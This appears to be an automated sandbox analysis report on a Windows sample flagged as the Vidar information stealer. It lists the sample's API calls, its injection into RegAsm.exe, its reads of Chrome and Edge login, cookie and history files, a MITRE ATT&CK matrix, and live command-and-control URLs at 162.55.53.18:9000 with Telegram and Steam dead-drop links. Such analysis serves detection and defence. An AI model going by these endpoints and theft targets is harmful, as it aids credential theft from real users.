Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: GetLocaleInfoW,	3_2_1B3D2112
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: EnumSystemLocalesW,	3_2_1B5AFF17
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	3_2_1B5C3300
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	3_2_1B3D3AA3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: EnumSystemLocalesW,	3_2_1B5C2D38
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: EnumSystemLocalesW,	3_2_1B5C2DF9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: EnumSystemLocalesW,	3_2_1B5C2CB6

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\ VolumeInformation			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\ VolumeInformation			Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00FDC943 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

0_2_00FDC943

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 3_2_00410874 GetProcessHeap,HeapAlloc,GetUserNameA,

3_2_00410874

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 3_2_0041093B GetProcessHeap,HeapAlloc,GetTimeZoneInformation,wsprintfA,

3_2_0041093B

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: Amcache.hve.6.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.6.dr	Binary or memory string: msmpeng.exe
Source: Amcache.hve.6.dr	Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: RegAsm.exe, 00000003.00000002.2942919191.00000000010A8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: Amcache.hve.6.dr	Binary or memory string: MsMpEng.exe

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct

Stealing of Sensitive Information

Yara detected Vidar stealer

Source: Yara match	File source: 3.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.file.exe.fd0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.2942073770.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1828525742.000000000100A000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.2942073770.0000000000453000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 5572, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 3872, type: MEMORYSTR

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior

Source: Yara match

File source: Process Memory Space: RegAsm.exe PID: 3872, type: MEMORYSTR

Remote Access Functionality

Yara detected Vidar stealer

Source: Yara match	File source: 3.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.file.exe.fd0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.2942073770.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1828525742.000000000100A000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.2942073770.0000000000453000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 5572, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 3872, type: MEMORYSTR

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_1B44DB10 sqlite3_initialize,sqlite3_bind_int64,sqlite3_step,sqlite3_column_bytes,sqlite3_column_blob,sqlite3_reset,sqlite3_free,sqlite3_free,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_free,	3_2_1B44DB10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_1B475910 sqlite3_mprintf,sqlite3_bind_int64,	3_2_1B475910
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_1B4FD9E0 sqlite3_bind_int64,sqlite3_log,sqlite3_log,sqlite3_log,sqlite3_bind_int64,sqlite3_log,sqlite3_log,sqlite3_log,	3_2_1B4FD9E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_1B44DFC0 sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_mprintf,sqlite3_bind_text,sqlite3_step,sqlite3_reset,	3_2_1B44DFC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_1B451FE0 sqlite3_mprintf,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,	3_2_1B451FE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_1B3E5C70 sqlite3_prepare_v3,sqlite3_bind_int64,sqlite3_step,sqlite3_column_value,sqlite3_result_value,sqlite3_reset,	3_2_1B3E5C70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_1B48D3B0 sqlite3_bind_int64,sqlite3_step,sqlite3_reset,	3_2_1B48D3B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_1B4751D0 sqlite3_mprintf,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,	3_2_1B4751D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_1B469090 sqlite3_reset,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_errmsg,sqlite3_mprintf,	3_2_1B469090
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_1B4AD610 sqlite3_free,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,	3_2_1B4AD610
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_1B4755B0 sqlite3_bind_int64,sqlite3_step,sqlite3_reset,	3_2_1B4755B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_1B4F14D0 sqlite3_bind_int64,sqlite3_log,sqlite3_log,sqlite3_log,	3_2_1B4F14D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_1B4FD4F0 sqlite3_bind_value,sqlite3_log,sqlite3_log,sqlite3_log,	3_2_1B4FD4F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_1B3E4820 sqlite3_bind_int64,sqlite3_step,sqlite3_column_int64,sqlite3_reset,sqlite3_reset,sqlite3_initialize,	3_2_1B3E4820
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_1B400FB0 sqlite3_result_int64,sqlite3_result_double,sqlite3_result_int,sqlite3_prepare_v3,sqlite3_bind_int64,sqlite3_step,sqlite3_column_value,sqlite3_result_value,sqlite3_reset,	3_2_1B400FB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_1B4B4D40 sqlite3_bind_int64,sqlite3_step,sqlite3_column_int64,sqlite3_reset,sqlite3_reset,InitOnceBeginInitialize,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_free,	3_2_1B4B4D40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_1B448200 sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_step,sqlite3_column_int64,sqlite3_reset,sqlite3_bind_int64,sqlite3_step,sqlite3_column_int,sqlite3_reset,	3_2_1B448200
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_1B4206E0 sqlite3_bind_int64,sqlite3_step,sqlite3_column_int64,sqlite3_reset,	3_2_1B4206E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_1B3F8680 sqlite3_mprintf,sqlite3_mprintf,sqlite3_initialize,sqlite3_finalize,sqlite3_free,sqlite3_mprintf,sqlite3_bind_value,sqlite3_bind_int64,sqlite3_bind_int64,	3_2_1B3F8680
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_1B428550 sqlite3_bind_int64,sqlite3_step,sqlite3_column_int64,sqlite3_reset,sqlite3_reset,	3_2_1B428550
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_1B407810 sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_bind_int64,sqlite3_bind_value,sqlite3_step,sqlite3_reset,	3_2_1B407810
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_1B493770 sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,	3_2_1B493770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_1B4B37E0 sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,	3_2_1B4B37E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_1B3FB400 sqlite3_mprintf,sqlite3_mprintf,sqlite3_free,sqlite3_bind_value,sqlite3_reset,sqlite3_step,sqlite3_reset,sqlite3_column_int64,	3_2_1B3FB400
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_1B42EF30 sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_result_error_code,	3_2_1B42EF30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_1B43E200 sqlite3_initialize,sqlite3_free,sqlite3_bind_int64,sqlite3_bind_blob,sqlite3_step,sqlite3_reset,	3_2_1B43E200
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_1B44E170 sqlite3_bind_int64,sqlite3_step,sqlite3_reset,	3_2_1B44E170
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_1B43E090 sqlite3_bind_int64,sqlite3_bind_value,sqlite3_step,sqlite3_reset,	3_2_1B43E090
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_1B44A6F0 sqlite3_mprintf,sqlite3_mprintf,sqlite3_mprintf,sqlite3_free,sqlite3_bind_value,	3_2_1B44A6F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_1B3E66C0 sqlite3_mprintf,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_bind_int64,sqlite3_bind_null,sqlite3_bind_blob,sqlite3_bind_value,sqlite3_free,sqlite3_bind_value,sqlite3_step,sqlite3_reset,	3_2_1B3E66C0

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Windows Management Instrumentation	1 DLL Side-Loading	1 DLL Side-Loading	1 Deobfuscate/Decode Files or Information	1 OS Credential Dumping	2 System Time Discovery	Remote Services	1 Archive Collected Data	2 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Native API	Boot or Logon Initialization Scripts	511 Process Injection	2 Obfuscated Files or Information	LSASS Memory	1 Account Discovery	Remote Desktop Protocol	1 Data from Local System	21 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	2 Command and Scripting Interpreter	Logon Script (Windows)	Logon Script (Windows)	1 DLL Side-Loading	Security Account Manager	3 File and Directory Discovery	SMB/Windows Admin Shares	1 Screen Capture	1 Non-Standard Port	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 Masquerading	NTDS	54 System Information Discovery	Distributed Component Object Model	Input Capture	2 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Virtualization/Sandbox Evasion	LSA Secrets	151 Security Software Discovery	SSH	Keylogging	13 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	511 Process Injection	Cached Domain Credentials	1 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	Compile After Delivery	DCSync	12 Process Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	Indicator Removal from Tools	Proc Filesystem	1 System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
file.exe	38%	Virustotal		Browse
file.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\sqlt[1].dll	0%	ReversingLabs

Unpacked PE Files

⊘No Antivirus matches

Domains

Source	Detection	Scanner	Label	Link
t.me	0%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label	Link
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	0%	URL Reputation	safe
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	0%	URL Reputation	safe
http://upx.sf.net	0%	URL Reputation	safe
https://www.ecosia.org/newtab/	0%	URL Reputation	safe
https://ac.ecosia.org/autocomplete?q=	0%	URL Reputation	safe
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	0%	URL Reputation	safe
https://duckduckgo.com/chrome_newtab	0%	Avira URL Cloud	safe
https://162.55.53.18:9000/A	100%	Avira URL Cloud	malware
https://t.me/	0%	Avira URL Cloud	safe
https://162.55.53.18:9000/softokn3.dllEdge	100%	Avira URL Cloud	malware
https://162.55.53.18:9000FID	0%	Avira URL Cloud	safe
https://t.me/	0%	Virustotal		Browse
https://duckduckgo.com/ac/?q=	0%	Avira URL Cloud	safe
https://162.55.53.18:9000/B	100%	Avira URL Cloud	malware
https://t.me/memve4erin	100%	Avira URL Cloud	malware
https://t.me/memve4erin	2%	Virustotal		Browse
https://162.55.53.18:9000/softokn3.dll10.15;	100%	Avira URL Cloud	malware
https://web.telegram.org	0%	Avira URL Cloud	safe
https://162.55.53.18:9000/B	4%	Virustotal		Browse
https://162.55.53.18:9000/freebl3.dllu	100%	Avira URL Cloud	malware
https://162.55.53.18:9000/sqlt.dll	100%	Avira URL Cloud	malware
https://duckduckgo.com/chrome_newtab	0%	Virustotal		Browse
https://web.telegram.org	0%	Virustotal		Browse
https://duckduckgo.com/ac/?q=	0%	Virustotal		Browse
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17	0%	Avira URL Cloud	safe
https://162.55.53.18:9000646ff6le	0%	Avira URL Cloud	safe
https://162.55.53.18:9000/46ff6le	100%	Avira URL Cloud	malware
https://162.55.53.18:9000/msvcp140.dll	100%	Avira URL Cloud	malware
https://162.55.53.18:9000/tm	100%	Avira URL Cloud	malware
https://162.55.53.18:9000/sqlt.dll	16%	Virustotal		Browse
https://162.55.53.18:9000/softokn3.dll	100%	Avira URL Cloud	malware
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17rer.exe	0%	Avira URL Cloud	safe
https://162.55.53.18:9000/msvcp140.dllEdge	100%	Avira URL Cloud	malware
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install	0%	Avira URL Cloud	safe
https://t.me/memve4erin&	0%	Avira URL Cloud	safe
https://t.me/m	0%	Avira URL Cloud	safe
https://162.55.53.18:9000/msvcp140.dll	11%	Virustotal		Browse
https://162.55.53.18:9000/vcruntime140.dllUser	100%	Avira URL Cloud	malware
https://162.55.53.18:9000/p	100%	Avira URL Cloud	malware
https://162.55.53.18:9000/MH	100%	Avira URL Cloud	malware
https://162.55.53.18:9000/msvcp140.dllEdge	11%	Virustotal		Browse
https://162.55.53.18:9000/l	100%	Avira URL Cloud	malware
http://www.sqlite.org/copyright.html.	0%	Avira URL Cloud	safe
https://162.55.53.18:9000/freebl3.dllsposition:	100%	Avira URL Cloud	malware
https://t.me/m	0%	Virustotal		Browse
https://162.55.53.18:9000/l	11%	Virustotal		Browse
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	0%	Avira URL Cloud	safe
https://162.55.53.18:9000/bW	100%	Avira URL Cloud	malware
https://162.55.53.18:9000/vcruntime140.dlle	100%	Avira URL Cloud	malware
https://162.55.53.18:9000/	100%	Avira URL Cloud	malware
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	0%	Virustotal		Browse
https://162.55.53.18:9000/sqlt.dllB	100%	Avira URL Cloud	malware
https://162.55.53.18:9000al	0%	Avira URL Cloud	safe
http://www.sqlite.org/copyright.html.	0%	Virustotal		Browse
https://162.55.53.18:9000/ZG	100%	Avira URL Cloud	malware
https://162.55.53.18:9000tel	0%	Avira URL Cloud	safe
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	0%	Avira URL Cloud	safe
https://162.55.53.18:9000/	16%	Virustotal		Browse
https://162.55.53.18:9000/nss3.dlloft	100%	Avira URL Cloud	malware
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016	0%	Avira URL Cloud	safe
https://162.55.53.18:9000ming	0%	Avira URL Cloud	safe
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016ost.exe	0%	Avira URL Cloud	safe
https://162.55.53.18:9000/vcruntime140.dll	100%	Avira URL Cloud	malware
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016	0%	Virustotal		Browse
https://162.55.53.18:9000/Zm	100%	Avira URL Cloud	malware
https://162.55.53.18:9000nbfoldnt-Disposition:	0%	Avira URL Cloud	safe
https://162.55.53.18:9000/$	100%	Avira URL Cloud	malware
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	0%	Virustotal		Browse
https://162.55.53.18:9000/freebl3.dll	100%	Avira URL Cloud	malware
https://162.55.53.18:9000/vcruntime140.dllA	100%	Avira URL Cloud	malware
https://162.55.53.18:9000/cG4	100%	Avira URL Cloud	malware
https://162.55.53.18:9000/vcruntime140.dllppet	100%	Avira URL Cloud	malware
https://162.55.53.18:9000/nss3.dllJ	100%	Avira URL Cloud	malware
https://162.55.53.18:9000	100%	Avira URL Cloud	malware
https://162.55.53.18:9000/softokn3.dll2	100%	Avira URL Cloud	malware
https://162.55.53.18:90001234567890hrome	0%	Avira URL Cloud	safe
https://162.55.53.18:9000/nss3.dll	100%	Avira URL Cloud	malware
https://162.55.53.18:9000/4	100%	Avira URL Cloud	malware
https://162.55.53.18/	100%	Avira URL Cloud	malware
https://steamcommunity.com/profiles/76561199699680841	100%	Avira URL Cloud	malware
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples	0%	Avira URL Cloud	safe
https://162.55.53.18:9000/freebl3.dll~	100%	Avira URL Cloud	malware
https://162.55.53.18:9000/mozglue.dll	100%	Avira URL Cloud	malware
https://162.55.53.18:9000/.53.18:9000/	100%	Avira URL Cloud	malware
https://162.55.53.18:9000tacrosoft	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
t.me	149.154.167.99	true	true	0%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://t.me/memve4erin	true	2%, Virustotal, Browse Avira URL Cloud: malware	unknown
https://steamcommunity.com/profiles/76561199699680841	true	Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://duckduckgo.com/chrome_newtab	BAEHIE.3.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://t.me/	RegAsm.exe, 00000003.00000002.2942656368.0000000000F7A000.00000004.00000020.00020000.00000000.sdmp	true	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://162.55.53.18:9000FID	RegAsm.exe, 00000003.00000002.2942073770.0000000000453000.00000040.00000400.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://162.55.53.18:9000/softokn3.dllEdge	RegAsm.exe, 00000003.00000002.2942073770.000000000056E000.00000040.00000400.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://162.55.53.18:9000/A	RegAsm.exe, 00000003.00000002.2942919191.00000000010BD000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://duckduckgo.com/ac/?q=	BAEHIE.3.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://162.55.53.18:9000/B	RegAsm.exe, 00000003.00000002.2942919191.00000000010BD000.00000004.00000020.00020000.00000000.sdmp	false	4%, Virustotal, Browse Avira URL Cloud: malware	unknown
https://web.telegram.org	RegAsm.exe, 00000003.00000002.2942073770.0000000000453000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2942656368.0000000000FF2000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://162.55.53.18:9000/softokn3.dll10.15;	RegAsm.exe, 00000003.00000002.2942073770.000000000056E000.00000040.00000400.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://162.55.53.18:9000/freebl3.dllu	RegAsm.exe, 00000003.00000002.2942919191.00000000010CF000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://162.55.53.18:9000/sqlt.dll	RegAsm.exe, 00000003.00000002.2942073770.0000000000491000.00000040.00000400.00020000.00000000.sdmp	false	16%, Virustotal, Browse Avira URL Cloud: malware	unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	BAEHIE.3.dr	false	URL Reputation: safe	unknown
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17	RegAsm.exe, 00000003.00000002.2942073770.00000000004D5000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2942073770.000000000056E000.00000040.00000400.00020000.00000000.sdmp, GDBFHD.3.dr	false	Avira URL Cloud: safe	unknown
https://162.55.53.18:9000646ff6le	RegAsm.exe, 00000003.00000002.2942073770.0000000000453000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2942073770.00000000004B6000.00000040.00000400.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://162.55.53.18:9000/46ff6le	RegAsm.exe, 00000003.00000002.2942073770.000000000056E000.00000040.00000400.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://162.55.53.18:9000/msvcp140.dll	RegAsm.exe, 00000003.00000002.2942919191.00000000010CF000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2942073770.000000000056E000.00000040.00000400.00020000.00000000.sdmp	false	11%, Virustotal, Browse Avira URL Cloud: malware	unknown
https://162.55.53.18:9000/tm	RegAsm.exe, 00000003.00000002.2942919191.00000000010CF000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://162.55.53.18:9000/softokn3.dll	RegAsm.exe, 00000003.00000002.2942919191.00000000010CF000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2942073770.000000000056E000.00000040.00000400.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17rer.exe	RegAsm.exe, 00000003.00000002.2942073770.00000000004D5000.00000040.00000400.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://162.55.53.18:9000/msvcp140.dllEdge	RegAsm.exe, 00000003.00000002.2942073770.000000000056E000.00000040.00000400.00020000.00000000.sdmp	false	11%, Virustotal, Browse Avira URL Cloud: malware	unknown
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install	GDBFHD.3.dr	false	Avira URL Cloud: safe	unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	BAEHIE.3.dr	false	URL Reputation: safe	unknown
https://t.me/memve4erin&	RegAsm.exe, 00000003.00000002.2942656368.0000000000FD1000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://t.me/m	RegAsm.exe, 00000003.00000002.2942656368.0000000000F7A000.00000004.00000020.00020000.00000000.sdmp	true	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://162.55.53.18:9000/vcruntime140.dllUser	RegAsm.exe, 00000003.00000002.2942073770.0000000000453000.00000040.00000400.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://162.55.53.18:9000/p	RegAsm.exe, 00000003.00000002.2942919191.00000000010CF000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://162.55.53.18:9000/MH	RegAsm.exe, 00000003.00000002.2942919191.00000000010CF000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://162.55.53.18:9000/l	RegAsm.exe, 00000003.00000002.2942073770.000000000056E000.00000040.00000400.00020000.00000000.sdmp	false	11%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://www.sqlite.org/copyright.html.	RegAsm.exe, 00000003.00000002.2949605614.000000001B61D000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2943981511.0000000015676000.00000004.00000020.00020000.00000000.sdmp, sqlt[1].dll.3.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://162.55.53.18:9000/freebl3.dllsposition:	RegAsm.exe, 00000003.00000002.2942073770.000000000056E000.00000040.00000400.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	BAEHIE.3.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://162.55.53.18:9000/bW	RegAsm.exe, 00000003.00000002.2942919191.00000000010CF000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
